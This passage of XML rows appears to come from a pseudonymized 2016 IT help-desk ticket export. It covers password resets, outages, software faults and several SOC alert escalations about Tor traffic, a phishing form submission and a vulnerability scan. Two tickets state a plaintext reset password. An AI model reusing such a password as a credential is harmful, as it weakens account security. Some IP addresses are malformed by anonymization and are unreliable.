    <s v="we are seeing your 10.16.4.16/isensor04.company.com device generating '52734 vid28367 tor ssl server certificate detected - inbound' alerts that occurred on 2016-07-15 at 13:26:58 for traffic (not blocked) from port 9001/tcp of 95.211.216.9/95.211.216.9 to port 54528/tcp of 41.29.63.92663 indicating that 95.211.216.9/95.211.216.9 is generating tor traffic._x000d__x000a_ _x000d__x000a_please note that, depending on the placement of isensor04.company.com/10.16.4.16, there is a possibility that eszl8111123/41.29.63.92663 is your nated host. if this is the case, please examine your nat logs to determine the true destination of this activity. if you do not wish to be alerted on these events, please let us know and we will automatically resolve these alerts when they're destined to your nated host._x000d__x000a_ _x000d__x000a_tor activity does not immediately indicate malicious activity, however the presence of anonymizing software should be investigated to determine if this is authorized or expected activity. tor activity indicates a possible policy violation which in turn could lead to a potential compromise. tor is being increasingly used by malware, therefore tor activity may also indicate a malware infection._x000d__x000a_ _x000d__x000a_we are escalating this incident to you via a medium priority ticket and  no phone call per our default handling policy.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1) full escalation for anonymous communication traffic (tor, etc.) alerts where the traffic was not blocked (explicit notification via a high priority ticket and phone call)_x000d__x000a_2) automatically resolve anonymous communication traffic (tor, etc.) alerts where the traffic was not blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a_ _x000d__x000a_sincerely,_x000d__x000a_dell  soc"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v=" incident #in33541962 - phishing form submit - outbound beshryulisted ip - dane-williuthyr"/>
    <s v="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_x000a__x000a_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877._x000a_1) full escalation for related events (high priority ticket and a phone call)._x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a__x000a_event id: 304247119_x000a_event summary: [ipbl]: phishing form submit - outbound beshryulisted ip_x000a_occurrence count: 1_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 10.38.93.30_x000a_source hostname: dane-williuthyr_x000a_source mac address: 28:5a:eb:51:db:f0_x000a_destination ip: 107.180.41.85_x000a_destination hostname: ip-107-180-41-85.ip.secureserver.net._x000a_destination ip geolocation: schtrtgoyhtsdale, usa_x000a_connection directionality: outgoing_x000a__x000a_device information_x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 701525_x000a_inspector event id: 031724385_x000a_agent id: 103611_x000a__x000a_event detail:_x000a_aug 8 13:11:36 18.79.63.203 %asa-6-302013: built outbound tcp connection 2173940377 for outside:107.180.41.85/80 (107.180.41.85/80) to inside:10.38.93.30/58345 (12.161.199.50/14084)_x000a__x000a_[correlation_data]_x000a_aug 8 06:46:44 27.38.93.278 dhcpd[2261]: dhcpack on 10.38.93.30 to 28:5a:eb:51:db:f0 (dane-williuthyr) via eth1 relay 10.38.92.1 lease-duration 604800 (renew)_x000a_take action_x000a__x000a_ticket action:_x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="skype on the m.curhetyu rack pc is not working, not allowing me to connect but seems to work for others."/>
    <s v="skype on the m.curhetyu rack pc is not working, not allowing me to connect but seems to work for others."/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="dsw in22457494"/>
    <s v="dsw in33568505_x000d__x000a__x000d__x000a_we are seeing your 172.20.10.208/isensor02.company.com device generating '49305 vid1029 openvas vulnerability scanner user-agent detected (inbound)' alerts for allowed traffic from port 55829/tcp of 198.8.80.219 to port 80/tcp of 30.28.15.015/30.28.15.015. this traffic indicates that 198.8.80.219 is using the openvas scanner, as indicated in the event details, against 30.28.15.015/30.28.15.015._x000d__x000a__x000d__x000a_blocking each source ip address may not necessarily be productive due to attackers' ability to switch ip addresses through the use of proxies, anonymizing software such as tor, and vpns. please investigate the targeted host to determine whether you are running a vulnerable version of the application being targeted. _x000d__x000a__x000d__x000a_this ticket will effectively serve as a master ticket for any related alerts until we receive feedback from you on how to handle these events going forward. please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at 877. we have a number of options available for the handling of future alerts such as this one:_x000d__x000a__x000d__x000a_1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal)._x000d__x000a_2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts._x000d__x000a_3) full escalation via a high priority ticket and a phone call for each unique source ip address. _x000d__x000a__x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="possible vulnerability scan from host.my-tss.com (198.8.80.219) on isensplant_247 (dmz)"/>
    <s v="dsw in33568733_x000d__x000a__x000d__x000a_we are seeing your 208.211.136.207/isensplant_247.company.com device generating '[o]: possible scan [696363]' alerts for traffic (not blocked) from host/198.8.80.219, indicating that it may be performing a vulnerability scan. _x000d__x000a__x000d__x000a_we are escalating this incident to you via a high priority ticket and phone call per your prior request.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 _x000d__x000a_1) ticket only for vulnerability scan alerts (explicit notification via a medium priority ticket and (no phone call))_x000d__x000a_2) automatically resolve vulnerability scan alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a__x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 43478312_x000d__x000a_event summary: [o]: possible scan [696363]_x000d__x000a_occurrence count: 52_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 198.8.80.219_x000d__x000a_source hostname: host.my-tss.com._x000d__x000a_source port: 56260_x000d__x000a_source ip geolocation: tarzana, usa_x000d__x000a_destination port: 80_x000d__x000a_destination ip geolocation: usa, usa_x000d__x000a_connection directionality: incoming_x000d__x000a_http method: get_x000d__x000a_host: 208.211.136.164_x000d__x000a_full url path: /global.asa_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 208.211.136.207_x000d__x000a_device name: isensplant_247.company.com_x000d__x000a_log time: 2016-08-10 at 19:14:58 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 524719_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 3_x000d__x000a_vendor version: 7_x000d__x000a_vendor reference: vid, 1009_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 896059_x000d__x000a_observation rule id (ile): 696363_x000d__x000a_inspector event id: 61816560_x000d__x000a_ontology id: 200020003203718788_x000d__x000a_event type id: 200020003203017106_x000d__x000a_agent id: 102989_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_this event indicates a single source generating 3 or more event summaries with a total of 50 or more occurrences in a 10 minute window. _x000d__x000a_occ     time        source              destination         summary_x000d__x000a_1       19:15:34    198.8.80.219        208.211.136.164     5799 vid1009 fx-scanner global.asa sourcecode access attempt (inbound)_x000d__x000a_1       19:15:43    198.8.80.219        30.28.15.015        5799 vid1009 fx-scanner global.asa sourcecode access attempt (inbound)_x000d__x000a_20      19:19:50    198.8.80.219        208.211.136.164     50713 viSID_26475 http post with phpinfo() (inbound)_x000d__x000a_20      19:19:58    198.8.80.219        30.28.15.015        50713 viSID_26475 http post with phpinfo() (inbound)_x000d__x000a_5       19:23:12    198.8.80.219        30.28.15.015        36613 vid12927 generirtc http header xss inbound_x000d__x000a_5       19:23:32    198.8.80.219        208.211.136.164     36613 vid12927 generirtc http header xss inbound_x000d__x000a__x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="nmpworvu upgtrvnj // monitor display issue "/>
    <s v="nmpworvu upgtrvnj // monitor display issue "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password chaning for window (company)"/>
    <s v="password chaning for window (company)"/>
    <s v="xtsuifdz wktgzcyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connect to the network the pc's in the inspection room"/>
    <s v="can you look in to getting the 2 pc's on to the network in the inspection room off of dept 48?  it would be nice to be able to share some images from the pc."/>
    <s v="huqvpyli ucrtkvyl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="umkrenhp beldshqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry for hr_tool site single sign on"/>
    <s v="inquiry for hr_tool site single sign on"/>
    <s v="qctdugsi bfqlgvos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="high priority-laptop monitor gone bad, unable to see screen, its completely beshryu"/>
    <s v="please give high priority since user is traveling from monday._x000a__x000a_service tag-37q3p32_x000a_ph--574"/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="need keybankrd in system tray and need picture of keybankrd too."/>
    <s v="need keybankrd in system tray and need picture of keybankrd too._x000a__x000a_helped user enabling keybankrd at system tray with preferred language but couldn't set up picture for it._x000a_hence as per user request assigning it to local it._x000a_contact # ; 393_x000a__x000a__x000a_"/>
    <s v="ravgfnqp gizaudke"/>
    <x v="62"/>
  </r>
  <r>
    <s v="company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 power supply issue."/>
    <s v="  internal power supply - on   company-eu-deu-germany-e-b2-f2-new-office-3550-access-sw01 (68.20.26.7986) is showing faulty_x000d__x000a__x000d__x000a_company-eu-deu-germany-e-b2-f2-new-&gt;sh env all_x000d__x000a_fan is ok_x000d__x000a_temperature is ok_x000d__x000a_power is faulty_x000d__x000a_rps is not present_x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="unable to log in to hub/ess portal"/>
    <s v="unable to log in to hub/ess portal"/>
    <s v="tfbvqliw xrqimykt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool issue "/>
    <s v="engineering_tool issue "/>
    <s v="cugjzqlf djwbyact"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp account for haunm keeps locking up, can you unlock please. SID_34"/>
    <s v="erp account for haunm keeps locking up, can you unlock please. SID_34"/>
    <s v="lipcoebu eyadxbif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool issue and zdsxmcwu thdjzolwronization "/>
    <s v="engineering_tool issue and zdsxmcwu thdjzolwronization "/>
    <s v="fpbmtxei jtqbcnfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request for company.com email address. "/>
    <s v="from: jertyur hanna _x000d__x000a_sent: thursday, september 01, 2016 8:02 pm_x000d__x000a_to: efbwiadp dicafxhv_x000d__x000a_subject: re: company email address request from sqmabtwn fchijage _x000d__x000a__x000d__x000a_approved._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="fljhvdsn kiyzclao"/>
    <x v="26"/>
  </r>
  <r>
    <s v="blank call //gso"/>
    <s v="blank call //gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset my password to daypay3 - SID_51"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bqjvxsaf.aupdonjy@gmail.com_x000d__x000a__x000d__x000a_reset my password to daypay3 - SID_51_x000d__x000a__x000d__x000a_"/>
    <s v="bqjvxsaf aupdonjy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hanna report access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: muywpnof.prtikusy@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_                i seem to have lost my access to hanna reports.  when in go in to analysis for excel it takes me into the general excel menu and when i choose a new sheet, the analysis tab is missing.  do i need to do something to get access to this back?_x000d__x000a__x000d__x000a_"/>
    <s v="muywpnof prtikusy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ie went to not legitmate website "/>
    <s v="814-_x000a_summary:on internet.  pop-up with reported microsoft registry failure of operating system._x000a__x000a_"/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="die synchronisierung mit exchange activesync"/>
    <s v="die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird."/>
    <s v="gferjcsh apqwniyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="lwbchnga axpqctfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio does not work."/>
    <s v="skype audio does not work."/>
    <s v="wsimcqzt xvwzbdhq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inc1541133 - ticket update"/>
    <s v="inc1541133 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: usa mi site is hard down at 9:29 am et on 09/01. there is no backup circuit."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______9:29 am et on 09/01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when sending emails from w-corp-ebusiness.service the sent emails show up in my personal sent folder "/>
    <s v="contact # : 803_x000a_summary: when sending emails from w-corp-ebusiness.service the sent emails show up in my personal sent folder and not in the ebusiness sent folder._x000a_it does this for all users in the company ebusiness email box_x000a__x000a__x000a_"/>
    <s v="gtfdvnry nxsaqrfh"/>
    <x v="26"/>
  </r>
  <r>
    <s v="av system usa"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gdkiehbr.kdithjsr@gmail.com_x000d__x000a__x000d__x000a_please provide it support for the uacyltoe hxgayczeing on the new av system in the main training room in usa. we need to uacyltoe hxgaycze the system to complete the finial sign off for the vendor._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="gdkiehbr kdithjsr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ie not working."/>
    <s v="ie not working."/>
    <s v="esfiuwcp pkaqnret"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hard disk failure on esxi host atjsv001"/>
    <s v="hard disk failure on esxi host atjsv001"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="esfiuwcp pkaqnret"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_108(kirty - plm conversion - production): disk free on e:\ is now 3%."/>
    <s v="HostName_108(kirty - plm conversion - production): disk free on e:\ is now 3%."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="log on balancing error ; even after connecting to vpn"/>
    <s v="log on balancing error ; even after connecting to vpn"/>
    <s v="urkwvedc qcibogpt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email will not open"/>
    <s v="_x000a__x000a_received from: wxnetroc.yecbmliq@gmail.com_x000a__x000a_desktop email will not open._x000a__x000a_wxnetroc yecbmliq_x000a_252_x000a__x000a_sent from my ipad_x000a__x000a__x000a_"/>
    <s v="wxnetroc yecbmliq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms office upgrade ;  from 2013 to 2016"/>
    <s v="ms office upgrade ;  from 2013 to 2016"/>
    <s v="skmdgnuh utgclesd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue slow"/>
    <s v="outlook running slow."/>
    <s v="avglmrts vhqmtiua"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:  india site is down at 9:00 am et on 09/01. no backup circuit."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ______no___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________9:00 am et on 09/01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_na____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na__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printer driver installation"/>
    <s v="name:rohntyub dfhtyuison_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zstkagwu.jlyrhdcf@gmail.com_x000a_customer number:_x000a_telephone:83_x000a_summary:hello, i am having issues printing to my regular printer. i get an error saying &quot;no pages selected&quot; and sometimes i am prompted to download a new driver."/>
    <s v="zstkagwu jlyrhdcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po - a4 4505633620"/>
    <s v="hello  it,_x000d__x000a__x000d__x000a_there are 3 item linked with the finished materials  7302795, but only one time is showed in po. please help check it, "/>
    <s v="bejcxvis anxmhwis"/>
    <x v="29"/>
  </r>
  <r>
    <s v="the zcor0003 report will not work.  this is critical to the financial close."/>
    <s v="the transaction report zcor0003 when ran is producing no data.  this is a sa38 report.  this is critical to the financial close._x000d__x000a_"/>
    <s v="viyglzfo ajtfzpkb"/>
    <x v="9"/>
  </r>
  <r>
    <s v=" password reset does not work in iehs (ticket_no1546057)"/>
    <s v="from: aorthyme rnsuipbk _x000a_sent: thursday, september 01, 2016 6:38 pm_x000a_to: 'iehshelpdesk.us@anteagroup.com'_x000a_cc: ndkrcxjb hpormqtx; ugyothfz ugrmkdhx_x000a_subject: password reset does not work in iehs (ticket_no1546057)_x000a__x000a_hello,_x000a__x000a_mr. roesshnktler is having trouble to reset his password in _x000a_whenever he is trying to reset the password, it says that 'your password has been sent to the provided email address'. but he does not receive any password in his mail._x000a__x000a_we have checked and rightly put the email address._x000a__x000a_please help._x000a__x000a_"/>
    <s v="ndkrcxjb hpormqtx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="jchlkard tcaiyjfg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wifi not working "/>
    <s v="wifi not working "/>
    <s v="skmdgnuh utgclesd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plm"/>
    <s v="_x000a__x000a_received from: grkaqnzu.mldekqpi@gmail.com_x000a__x000a_hallo,_x000a__x000a_fÃ¼r unsere neuen azubis_x000a_hspgxeit prwiqjto (diehfhyumj)_x000a_und_x000a_hdmwolxq xqbevoic (bhdikthyu)_x000a_wird noch die plm-berechtigung benÃ¶tigt._x000a__x000a_mit freundlichen grÃ¼ÃŸen,_x000a_with best "/>
    <s v="grkaqnzu mldekqpi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reactivate account for user : vvsimpj till 31st october 2016"/>
    <s v="please reactivate account for user : vvsimpj till 31st october 2016"/>
    <s v="aymgdoqt eoxphqas"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
    <s v="erp SID_34 password reset "/>
    <s v="gidpowxt mpdyvsrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v=".7z file can't be opened."/>
    <s v=".7z file can't be opened."/>
    <s v="shkwgxln ikpvtjgn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erirtc wants to see an archived mail from a particular date."/>
    <s v="erirtc wants to see an archived mail from a particular date."/>
    <s v="wczrtsja crwioekx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client is not working"/>
    <s v="i cannot start the business_client anymore, see screenshot attached."/>
    <s v="juqpaxry ulqfbiog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="one team update"/>
    <s v="one team update"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool - user is not able to import employee data // ooo till 5th sept"/>
    <s v="user: ehidbxam.rnupoxeq@gmail.com_x000d__x000a_issue: user is not able to import data to portal - please find attached mail."/>
    <s v="ehidbxam rnupoxeq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 and SID_21 unlock and password reset."/>
    <s v="erp SID_34 and SID_21 unlock and password reset."/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="licwu3 unlock"/>
    <s v="licwu3 unlock"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dnc430 unlock"/>
    <s v="dnc430 unlock"/>
    <s v="relvzfnc nqksogtm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user called to reset password, account is disabled in ad : bmwtqxns.fcrqkhix@gmail.com"/>
    <s v="user called to reset password, account is disabled in ad : bmwtqxns.fcrqkhix@gmail.com"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password reset , erp SID_34"/>
    <s v="erp password reset , erp SID_34"/>
    <s v="myaornqv fkjmpxbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor resolution issue"/>
    <s v="_x000a__x000a_received from: zjawqgcs.tohqcxla@gmail.com_x000a__x000a_hi there,_x000a__x000a_i changed to a large monitor, but the screen resolution is not right. i want to change to 1900x1200, but got error message like this &quot;the current input timing is not supported by the monitor display. please change your input timing to 1920x1080@60hz or any other monitor listed timing as per the monitor specifications&quot;_x000a__x000a__x000a_can you help me out please?_x000a__x000a_"/>
    <s v="zjawqgcs tohqcxla"/>
    <x v="2"/>
  </r>
  <r>
    <s v="email not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zjawqgcs.tohqcxla@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a__x000d__x000a_i tried to use  my email but it still shows loading after 30 mins. i have use the web-based office to check email._x000d__x000a__x000d__x000a_can you help to fix that? "/>
    <s v="zjawqgcs tohqcxla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 - can not sign in "/>
    <s v="_x000a__x000a_received from: oxrnpuys.oxizkwmq@gmail.com_x000a__x000a_i cannot sign in_x000a__x000a_alexgnhtjunder_x000a__x000a_[cid:image001.jpg@01d20453.21c570f0]_x000a_[cid:image002.jpg@01d20453.21c570f0]_x000a__x000a_best "/>
    <s v="oxrnpuys oxizkwmq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="please assist erp log on need to be reset. not sure why but cant log on."/>
    <s v="_x000a__x000a_received from: gvderpbx.udrzjxkm@gmail.com_x000a__x000a_gvderpbx udrzjxkm_x000a_junior application sales engineer_x000a_gvderpbx.udrzjxkm@gmail.com&lt;mailto:gvderpbx.udrzjxkm@gmail.com&gt;_x000a_"/>
    <s v="gvderpbx udrzjxkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please assist, symantec questions and answers."/>
    <s v="_x000a__x000a_received from: gvderpbx.udrzjxkm@gmail.com_x000a__x000a_[cid:image001.jpg@01d20451.9d7b95f0]_x000a__x000a_gvderpbx udrzjxkm_x000a_junior application sales engineer_x000a_gvderpbx.udrzjxkm@gmail.com&lt;mailto:gvderpbx.udrzjxkm@gmail.com&gt;_x000a_"/>
    <s v="gvderpbx udrzjxkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad locked out"/>
    <s v="ad locked out : password reset through password_management_tool password manager."/>
    <s v="lwyghvsc erftxsny"/>
    <x v="0"/>
  </r>
  <r>
    <s v="quality certificate abode form over lapping"/>
    <s v="quality certificate abode form over lapping in one page. can u rectify it in page 1 and page2. _x000d__x000a_i have attached one example form for your reference."/>
    <s v="sxkfbnaw ktbfuiah"/>
    <x v="44"/>
  </r>
  <r>
    <s v="circuit outage : apac,apac-dmvpn circuit is down at 5:13 am et on 09/01. site is up on primary circuit."/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo site_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________ 5:13 am et on 09/01______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __no_x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ________na___   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na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erp help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vfyuldps.kjgcaphx@gmail.com_x000d__x000a__x000d__x000a_hi, dear sir/madam_x000d__x000a__x000d__x000a_i ask your help for the erp pr process._x000d__x000a__x000d__x000a_i went to erp inbox from workflow system. keep pop up the screen below even i just accessed 10 sec._x000d__x000a_please kindly check and fix._x000d__x000a__x000d__x000a_"/>
    <s v="vfyuldps kjgcaphx"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to login to engineering tool"/>
    <s v="hi,_x000a__x000a_i changed the password through password_management_tool, and now unable to lonin to engineering tool_x000a_pls help_x000a_jayhrt bhatyr_x000a_extn393_x000a_"/>
    <s v="rmdtqfxa fwpnqdxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit erpgui \ ewewx212495 \vzqomdgt jwoqbuml"/>
    <s v="probleme mit erpgui \ ewewx212495 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit erpgui \ ewewx212493 \vzqomdgt jwoqbuml"/>
    <s v="probleme mit erpgui \ ewewx212493 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="laptop not chatryung from doc station"/>
    <s v="when connected the laptop to doc station its not charging battery"/>
    <s v="gxibtzek fgkpqjsb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="outlook is continuously asking for password."/>
    <s v="outlook is continuously asking for password."/>
    <s v="psrqxzmn qbefohdl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer configuration "/>
    <s v="printer configuration _x000a__x000a_0774_x000a_summary:i need to configure printer in t10 region, kindly help to do the same_x000a_ricoh aficio mp 2000 pcl16_x000a_ii02"/>
    <s v="fmjwzstr yjotleqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="konto neu erstellen : ewew8323504 und ewew7212495"/>
    <s v="ewew8323504 optiplex 780 lager hr.darda_x000d__x000a_ewew8323506 optiplex 780 lager hr.darda_x000d__x000a_"/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="telefonanlage - nebenstelle 20 auf wild marfhtyio umprogramdntymieren!"/>
    <s v="telefonanlage - nebenstelle 20 auf wild marfhtyio umprogramdntymieren!"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="32"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="yaskgmoc nzriogja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp gui has be installed"/>
    <s v="erp gui has be installed"/>
    <s v="shjbrutf iknuqswm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="software not working on laptop - engineering_tool - outlook - internet explorer. had a security warning and all have stopped perform"/>
    <s v="had a firewall warning and software stopped working."/>
    <s v="vebizknu qlknijvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook ä¸èƒ½å¯åŠ¨ã€‚"/>
    <s v="outlook ä¸èƒ½å¯åŠ¨ã€‚"/>
    <s v="ebkmczgy pbzfgcoa"/>
    <x v="31"/>
  </r>
  <r>
    <s v="engineering_tool and engineering_tool not working"/>
    <s v="_x000a__x000a_received from: cugjzqlf.djwbyact@gmail.com_x000a__x000a_hello_x000a__x000a_my system is facing an issues while connecting engineering_tool and engineering_tool software, below is the erro message:_x000a__x000a_1.       engineering_tool_x000a_[cid:image001.png@01d20452.3d767b10]_x000a__x000a_2.       for engineering_tool_x000a_[cid:image002.png@01d20452.3d767b10]_x000a_please support_x000a__x000a_cugjzqlf djwbyact_x000a_executive sales._x000a_company india ltd_x000a_mob â€“ 9128mail : cugjzqlf.djwbyact@gmail.com&lt;mailto:cugjzqlf.djwbyact@gmail.com&gt;_x000a_"/>
    <s v="cugjzqlf djwbyact"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit etiketten drucken \laser 01 \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="probleme mit etiketten drucken \laser 01 \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit etiketten drucken \laser 03 \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="probleme mit etiketten drucken \laser 03 \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \rechner instandsetzung \qnigujek kopqcjdh"/>
    <s v="setup new ws \rechner instandsetzung \qnigujek kopqcjdh"/>
    <s v="qnigujek kopqcjdh"/>
    <x v="24"/>
  </r>
  <r>
    <s v="webshop access."/>
    <s v="hello,_x000d__x000a_i didn't see my customers at webshop (distributor_tool). also i cann't chose any salesorg. _x000d__x000a_i have unlocked all my accounts and change the password, but the problem remains._x000d__x000a_"/>
    <s v="jzfboqgc zhmqwxgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp error"/>
    <s v="hi team, i am experiencing some error in erp SID_34 application. firstly i am not certain whether i am accessing SID_34 system or not. i have logged into netweaver 5.0 in my system. is this the correct application i should be using? please find attachment that can give a glimpse of the error. feel free to chat or email or phone call with me to understand more on this. "/>
    <s v="gpabsizh txldupyk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_toolmforrun failed in job_scheduler at: 09/01/2016 02:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_toolmforrun failed in job_scheduler at: 09/01/2016 02:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="reset the password for arsbtkvd qieagkos on erp / production / erp"/>
    <s v="please reset users password to daypay3"/>
    <s v="arsbtkvd qieagkos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install new optiplex 7020 as eagw8111311 - fy17 x64 company image"/>
